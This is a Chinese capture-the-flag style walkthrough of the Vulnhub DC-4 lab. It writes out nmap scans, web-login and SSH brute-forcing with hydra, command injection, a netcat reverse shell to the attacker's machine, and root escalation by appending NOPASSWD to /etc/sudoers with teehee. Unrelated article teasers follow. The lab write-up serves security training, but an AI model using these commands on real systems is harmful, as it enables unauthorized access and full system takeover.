【Vulnhub靶场】DC-4

DC-4靶场下载地址https://www.five86.com/downloads/DC-4.zip

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

扫描主机存活,扫描端口,扫描服务

第一步扫描出主机ip为192.168.118.141

nmap -sP 192.168.118.0/24
nmap -p- 192.168.118.141
nmap -sV -A 192.168.118.141

扫描出两个端口,22端口和80端口

使用dersearch扫描目录

dirsearch -u http://192.168.118.141

查看web服务,访问http://192.168.118.141

发现页面就只有一个登录页面,结合刚刚扫描出来的目录,也再没有价值

Getshell

尝试登录,使用bp抓包,发现也只提交了账号密码两个参数

密码爆破

猜测账号为admin,密码加载网上top1000弱口令密码尝试爆破

成功爆破出密码为 happy

使用得到的账号密码(admin :happy)登录web页面

登录成功,里面有一个命令执行小工具,提供三个命令可供选择

使用bp抓包查看一下

任意命令执行

发现提交的参数在这里被直接上传了,经过简单测试(修改提交的参数为id),可以看到,通过修改了POST传参radio的值达到了任意命令执行的效果

反弹shell

这里经过测试无法直接通过echo命令上传木马,也无法bash反弹,这里采用nc的方式反弹shell

在Kali主机上开启监听, 在靶机上面执行nc命令,将shell弹到Kali上

nc -lvvp 6666

nc -e /bin/bash 192.168.118.128 6666

最后成功反弹shell,但是并不是一个稳定shell

上传脚本得到使其升级为交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

切换用户

查看一下主机的普通用户,经过一系列查找,最终找到一个旧密码文件夹

cat 进去查看,是一大堆密码,结合刚刚寻找的目录,猜测应该是本地账户 jim的密码

在kali主机上创建pass.txt,将得到的密码放进里面

使用hydra工具爆破ssh,来得到jim的密码

hydra -l jim -P pass.txt ssh://192.168.118.141

爆破成功,我们成功得到了jim的密码:jibril04

 ssh连接

ssh jim@192.168.118.141

 这里提示我们有一个mail

使用find命令查找文件mail

find / -name "mail" 2>/dev/null

尝试给出的路径,最终得到了封信

这个人给出了他的密码,很明显,他是在home目录下的,尝试ssh登录一下

ssh charles@192.168.118.141

提权

查询一下可以执行root命令的指令 

使用teehee提权

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers

sudo su -root

这个命令的目的是将一行配置添加到 /etc/sudoers 文件中,以允许用户 charles 在不输入密码的情况下执行所有命令,然后以 root 用户的身份启动一个新的登录 shell

提权成功

最后在root目录下成功找到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/901501.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

高级 SQL 技巧全面教程:提升你的数据库操作能力

高级 SQL 技巧全面教程:提升你的数据库操作能力 引言 在数据驱动的时代,SQL(结构化查询语言)是与数据库交互的核心工具。虽然基础 SQL 语法足以满足日常需求,但掌握一些高级技巧能够显著提高你的工作效率和数据处理能…

Node.js初学者指南:搭建HTTP服务器、获取请求信息及响应、变量声明与NPM包管理

精神畅快,心气平和;饮食有节,寒暖当心;起居以时,劳逸均匀 文章目录 node.js使用http搭建服务器的问题获取请求相关的信息响应相关的信息var、let、const对比npm使用全局安装包 node.js 概念 node.js是一个基于Chrome …

RTE 2024 隐藏攻略

大家好!想必今年 RTE 大会议程大家都了解得差不多了,这将是一场实时互动和多模态 AI builder 的年度大聚会。 大会开始前,我们邀请了参与大会策划的 RTE 开发者社区和超音速计划的成员们,分享了不同活动的亮点和隐藏攻略。 请收…

使用Poste搭建内网邮件服务器

使用Poste搭建内网邮件服务器 Poste.io 也是一个流行的邮件服务器方案,它可以通过 Docker 容器轻松部署,非常适合搭建内部邮件服务器。 本文档将向您展示如何开始使用 Poste.io 邮件服务器。在 5 分钟内,您将拥有一个可发送和接收邮件的邮件…

WSL2 Ubuntu22.04编译安装LLVM

前提 这两天因为工作需要,要编译一个Debug版本的llvm。这里对编译安装过程进行一个简单的记录,同时也记录下这个过程中遇到的几个问题。 下载源码并编译 有关llvm编译安装的官方文档在这里。 从git仓库clone llvm的源码。 git clone https://github.c…

SD-WAN企业组网的应用场景

SD-WAN(软件定义广域网)能够实现企业不同站点之间的高效互联,确保分支机构、总部、数据中心以及云平台等站点的顺畅通信。本文将探讨从企业的WAN业务需求出发,可以将SD-WAN的组网场景分为哪几类。 SD-WAN的典型组网场景 企业站点之…

Docker中如何控制服务启动顺序实现探讨

文章目录 一、Docker概述二、Docker三剑客1. Compose2. Machine3. Swarm 三、简要需求1. 样例工程2. 代码模块3. 调用方向4. 期望启动顺序 四、思路分析1.各走各路1.)docker-compose -f指定不同配置文件2.)docker-compose up -d service-name指定服务名3…

基于SpringBoot的高校体测管理系统设计与实现(源码+定制+开发)高校体测记录系统设计、高校体测信息管理平台、智能体测管理系统开发、高校体测记录系统设计

博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台…

如何将markdown文件转换为pdf

最近笔者在用vscode写markdown,但是提交时往往需要交pdf。所以就涉及到如何将markdown转化为pdf格式。 首先,需要在vscode上安装插件 markdown Preview Enhanced 之后在vscode的右上角即可看到下述图标,点击,vscode右半面就会显示…

Spring Boot驱动的植物健康监测革命

1系统概述 1.1 研究背景 随着计算机技术的发展以及计算机网络的逐渐普及,互联网成为人们查找信息的重要场所,二十一世纪是信息的时代,所以信息的管理显得特别重要。因此,使用计算机来管理植物健康系统的相关信息成为必然。开发合适…

VulkanTutorial(1·简述,vs环境搭建)

介绍: 与OpenGL,WebGL和Direct3D等API((Application Programming Interface, 应用程序编程接口))相比,valkan更偏向于底层,有更多的GPU控制接口,因此它有更好的性能和更小的驱动开销&#xff0…

检索增强型生成模型RichRAG:为多面查询提供丰富回应

人工智能咨询培训老师叶梓 转载标明出处 大模型在处理静态知识更新和信息准确性方面仍面临挑战。为了解决这些问题,检索增强型生成(RAG)模型应运而生,它们通过检索文档来辅助语言模型生成更可靠的回答。但现有的RAG研究大多集中在…

springboot079信息化在线教学平台的设计与实现(论文+源码)_kaic

信息化在线教学平台的设计与实现 摘要 随着信息技术在管理上越来越深入而广泛的应用,管理信息系统的实施在技术上已逐步成熟。本文介绍了信息化在线教学平台的开发全过程。通过分析信息化在线教学平台管理的不足,创建了一个计算机管理信息化在线教学平台…

【人工智能】——matplotlib教程

文章目录 1.matplotlib简介2.基本绘图功能2.1给图形添加辅助功能2.2在一个坐标系中绘制多个图像2.3多个坐标系显示图像 3.常见图像绘制 1.matplotlib简介 matplotlib 是一个用于创建二维图表和数据可视化的 Python 库,它提供了一种类似于 MATLAB 的绘图接口。matplo…

Mybatis-07.基础操作-环境准备

一.需求说明 二.准备工作

网关三问:为什么微服务需要网关?什么是微服务网关?网关怎么选型?

文章整体介绍 本文旨在解答关于微服务网关的三个核心问题: 1)为什么需要网关?也即在何种场景下应采用微服务网关以优化系统架构; 2)什么是微服务网关?主要讲构成微服务网关的关键能力,包括但…

再传上市消息,奇瑞汽车追赶智能电动的“风”

近日,彭博社引述消息指出,奇瑞控股集团已选择中金公司、广发证券、华泰国际负责安排旗下汽车子公司奇瑞汽车潜在的IPO事宜。奇瑞汽车最早或于明年在香港上市,期望IPO估值超1,000亿元人民币。知情人士表示,审议仍在进行中&#xff…

Compose 修改默认点击效果

Compose 默认点击效果修改 一、Compose的默认点击效果二、实现自己的点击效果 一、Compose的默认点击效果 使用Modifier.clickables可以使Text有点击效果 Text(text "我是Text", modifier Modifier.clickable {})源码分析,点击效果clickable方法中的in…

一文彻底理解 JavaScript 解构赋值

一、基本概念 为什么需要解构呢,先来看一个例子: const student {name: ZhangSan,age: 18,scores: {math: 19,english: 85,chinese: 100} };function displayInfo(student) {console.log(name:, student.name);console.log(math:, student.scores.mat…

k8s 综合项目笔记

综述 这篇笔记主要是为了记录下自己写 k8s 综合项目的过程。 由于自己之前已经写过简单的开发和运维项目,所以这里就结合一下,在搭建 k8s 集群后安装运维常用服务,比如 ansible 和 prometheus,用 NFS 实现数据存储同步&#xff0c…